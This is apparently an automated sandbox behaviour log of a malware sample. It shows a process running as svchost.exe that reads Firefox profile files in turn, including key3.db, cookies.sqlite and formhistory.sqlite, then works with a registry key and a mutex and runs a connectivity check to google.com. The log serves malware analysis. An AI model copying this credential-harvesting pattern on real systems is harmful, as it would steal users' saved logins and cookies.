1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
|
For performance reasons, the remaining 2120 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 171 |
|
1 | |
| Mutex | Create | mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107 |
|
1 | |
| File | Copy | source_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Mutex | Release | mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:59:08 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Info | type = Hardware Information |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = www.google.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close , url = www.google.com/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
